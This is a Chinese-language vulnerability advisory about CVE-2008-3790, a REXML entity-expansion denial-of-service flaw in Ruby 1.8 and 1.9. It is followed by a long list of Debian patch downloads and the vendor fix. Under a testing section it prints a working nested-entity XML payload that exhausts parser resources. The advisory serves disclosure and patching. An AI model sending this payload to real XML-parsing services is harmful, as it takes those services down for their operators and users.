安全研究

安全漏洞
Ruby REXML库远程拒绝服务漏洞

发布日期:2008-08-23
更新日期:2008-08-25

受影响系统:
Yukihiro Matsumoto Ruby 1.9.x
Yukihiro Matsumoto Ruby 1.8.x
描述:
BUGTRAQ  ID: 30802
CVE(CAN) ID: CVE-2008-3790

Ruby是一种功能强大的面向对象的脚本语言。

Ruby使用REXML库解析入站的XML请求,如果用户受骗访问了恶意网页的话,攻击者就可以使用一种称为XML实体爆炸(entity explosion)的技术远程关闭任何解析XML的应用程序,包括Ruby和Ruby on Rails。

<*来源:Michael Koziarski
        Luka Treiber
  
  链接:http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/
        http://weblog.rubyonrails.com/2008/8/23/dos-vulnerabilities-in-rexml
        http://secunia.com/advisories/31602/
        http://www.debian.org/security/2008/dsa-1652
        http://www.debian.org/security/2008/dsa-1651
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
  <!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
  <!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
  <!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
  <!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
  <!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>

建议:
厂商补丁:

Debian
------
Debian已经为此发布了一个安全公告(DSA-1651-1)以及相应补丁:
DSA-1651-1:New ruby1.8 packages fix several vulnerabilities
链接:http://www.debian.org/security/2008/dsa-1651

补丁下载:
Source archives:

http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz
Size/MD5 checksum:  4434227 aae9676332fcdd52f66c3d99b289878f
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.dsc
Size/MD5 checksum:     1079 4c7df61bd710db620b87ae0a3b98d388
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.diff.gz
Size/MD5 checksum:   142603 f7c9366a3e04f00f5d4e7deb5d27eaf9

Architecture independent packages:

http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch3_all.deb
Size/MD5 checksum:  1241006 d8312745f5bf656d950323c6c9761e1e
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch3_all.deb
Size/MD5 checksum:   211002 1b5eefc0ee08f8224b14e9cc887c408e
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch3_all.deb
Size/MD5 checksum:   245020 e16a6c9adf8603359b5031e46185bf25
http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch3_all.deb
Size/MD5 checksum:   235612 69142939deabd04310455bb13f288c66
http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch3_all.deb
Size/MD5 checksum:   310244 e321a815c462f98b404b8c1665d1b55f

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:   903552 ad6a8ddd2bf50091f4379509c7b6cef4
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:  1869012 1a2090d92784326905495c96fe508bf2
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:   198226 b11408bce9fbb392955416fb76d3f6b8
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:   199160 e087c534968b3ee42d5c1a8eb271ffb0
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:  1638944 58b67c19df5d4394619792d1b8b40c03
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:   199128 5ff5a9ca775487dcd3eb6d1e1d4eb180
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:   219386 d12ee43d6a3f38b98852fedc2349d3d5
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:  1075242 ce403140ff57e22f5260226ff3d9325c
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_alpha.deb
Size/MD5 checksum:   301056 98e0e061f488d2b111f032a19d5a1060

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:  1068652 90b93dcde06d9ddcdee05ace2c42bb9e
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:   217282 f7c81dbf89b107a334ecd4bb4da66ba6
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:   198082 006299a09bf2074c481322dfbce9dfe6
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:   302902 6ef6a2d83f8b158b62ea62f3c4bba3fa
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:  1586654 9d7b4530804e8089a08a95c39bdeabbe
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:   748606 c07117a39289e01786fb9ee7a27a1829
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:  1864338 a6e21b1b7dca462d5fb45689fe092150
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:   197638 f6bb914b21492cf68cb1c4558e4ac644
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_amd64.deb
Size/MD5 checksum:   198694 4757a7c9b578208d761fe2ccdce3fa41

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:   200220 2d8704ff62159bb1e8c2fc635e9cb3b5
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:   199810 4e51aa246f1602dec04095780c0f5170
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:  1677464 394c17e4c1e40082701773314c3310e0
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:  1869130 04510cbc8347e4cd055f22b11a26b234
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:   824102 b40a7f34f9401e1461f2211c904d3153
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:  1042102 f7f16a8ffb6be3a6a874b49be5904da8
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:   316154 82f7dcc15c9ef9c542b12830910c72d4
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:   199118 6c2239c266c6e7653449780d6ab18f71
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_hppa.deb
Size/MD5 checksum:   219164 2ad50197b6cf436a728c5b615a52a046

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_i386.deb
Size/MD5 checksum:   999668 64201f397337b7478893c08afc261e00
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_i386.deb
Size/MD5 checksum:   293708 2327aefddae4e2dd58e9387e36a3934c
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_i386.deb
Size/MD5 checksum:   219408 e3cef11245e5554bef15f5598df21a8f
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_i386.deb
Size/MD5 checksum:   197598 56ccc12092d5296e8156c1bc4f411119
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_i386.deb
Size/MD5 checksum:   719716 329bf36bc69b73ac908d6131e12a9933
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_i386.deb
Size/MD5 checksum:   198252 e5df4a73eea74976f81949cfc085c722
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_i386.deb
Size/MD5 checksum:  1856646 f839ef877cc1d905f20868ac29d8c6d6
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_i386.deb
Size/MD5 checksum:   197916 221e994fe9132b0121ae1c1aef4d1a71
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_i386.deb
Size/MD5 checksum:  1534674 aff183539b7a3ffb37078d263b4c0fc4

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:   201426 7700f382729ccb1bf36b7361eda4e1e6
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:   330536 de290038777d785a40b96ecde67bcb79
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:   202400 425437ebd7a25ddcc24f0b00643e0e15
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:   971614 157129fd20a8e99bb060eb16d04b9b1e
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:  1895636 42981c9c01f3bfe0c29d9c89c67456ea
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:   218566 73418bc1a694edf6666a3bef64ab66b8
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:  1861876 81df0b92b58078d1414bca3298a801fd
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:   203346 861ceb05ebf6549fa2872f2f24eafdbd
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_ia64.deb
Size/MD5 checksum:  1026222 1c6b059f43c36a3d2195fb071a21c0c0

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mips.deb
Size/MD5 checksum:   196588 0b12b7621be85e03e3ccf9bb8bf18252
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mips.deb
Size/MD5 checksum:   802442 2a8e096b0bdec5cf68ca800bab083058
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mips.deb
Size/MD5 checksum:   217920 f7ad5607292040314c621508996c10e3
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mips.deb
Size/MD5 checksum:   197376 ceef5241e870f21a04406000cfe861f7
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mips.deb
Size/MD5 checksum:   281460 585fe80dfa9e975314e6df5ec9f35490
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mips.deb
Size/MD5 checksum:  1085282 94a0aa16383ec7f2ab88d742cead73c2
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mips.deb
Size/MD5 checksum:  1850952 26828e1d9dc0b6d24cfc9a8f5ea1bb33
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mips.deb
Size/MD5 checksum:  1540352 a1c65ec2cd909491de849c9907d2eabc
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mips.deb
Size/MD5 checksum:   197514 118cfb3032dd4b79691ba0f79341bcc4

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:   197666 42073374de4e32b274d2a485896d0734
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:  1060018 eb935e3e4592e2ac723b87227258526a
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:   279206 21f76e4afe491f2ceaaa90215e2e6dab
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:   198014 6ec3efd9b594a9cc2759d95b61f2a64a
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:  1538558 725d0012a98297cc4ae2c2aa6d76e73f
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:   218098 a75856178c8addc09ae0db8dd8349b88
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:   793332 fff033a8fde91eeaa458f2be3252a7bf
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:  1830324 a816a6d7bb2059cead4d5be647e66c03
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_mipsel.deb
Size/MD5 checksum:   197072 cc83f3923ec214e99dfb87552813e524

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:   219368 5033aca578c0a97d044b136adf2120d2
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:   293966 13f4c179f750c4ef69229f5f8c714908
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:   199990 900f11656f1bbfb7143c96eb6eca55b2
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:   199672 b36fcd86eae4a996aceea9f51ed82b6f
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:  1592660 53543d9b925d742e2dd0bb21842d9484
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:   199450 7eecb4e14d914ef9ce18297dafeb4beb
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:  1837328 fc2549416dba4e379f56755dc11cf3d5
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:  1108684 93123428d72447a94854d3ffa7feba05
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_powerpc.deb
Size/MD5 checksum:   718932 c59ae18feb43ed2dca6300adabb1a9e4

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_s390.deb
Size/MD5 checksum:   305246 14e3e5cddc2398095a39f5e7db03d50d
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_s390.deb
Size/MD5 checksum:   779454 22db8f14e5f3524693854a896d25dc73
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_s390.deb
Size/MD5 checksum:  1620164 25eb518ccfa74c490cd894a96d464743
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_s390.deb
Size/MD5 checksum:   199400 7f87e9c92d21d9f0cc27168c15b09e90
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_s390.deb
Size/MD5 checksum:   198604 f9b34b538bd4fae60bf1cfd357d78977
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_s390.deb
Size/MD5 checksum:   198918 8e6b256da2d93404909bffaf9741cb8a
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_s390.deb
Size/MD5 checksum:   217956 e0603b2614b4402e24763265af2a69aa
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_s390.deb
Size/MD5 checksum:  1838970 5eb6c09970d3a051d6fe1753893c7222
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_s390.deb
Size/MD5 checksum:  1051972 d10d44795254610d6f4becff47d5c3a7

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:   961570 c65f0632dc01bc50d209487741fc41f4
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:  1833402 426ef4a80f6c366231813b596c9bf46f
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:   197920 006e1097f7fdc7ac9a8b89413a56f2fe
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:  1543240 4c4c3f00fd078b2fa6778a3245569e87
http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:   197144 2cd715ed20b9c63c0c264adb6ed1c000
http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:   197866 71c08be787f0a4f683b91fc539ade3c3
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:   741182 9c970b4ccbba6cba80d8284218d33ef4
http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:   296052 9567adab606aecadbee3006a572f0965
http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3_sparc.deb
Size/MD5 checksum:   217898 b375854870d898692db953c88bf80e53

补丁安装方法:

1. 手工安装补丁包:

  首先,使用下面的命令来下载补丁软件:
  # wget url  (url是补丁下载链接地址)

  然后,使用下面的命令来安装补丁:  
  # dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包:

   首先,使用下面的命令更新内部数据库:
   # apt-get update
  
   然后,使用下面的命令安装更新软件包:
   # apt-get upgrade

Yukihiro Matsumoto
------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.ruby-lang.org/security/20080823rexml/rexml-expansion-fix.rb

浏览次数:4649
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客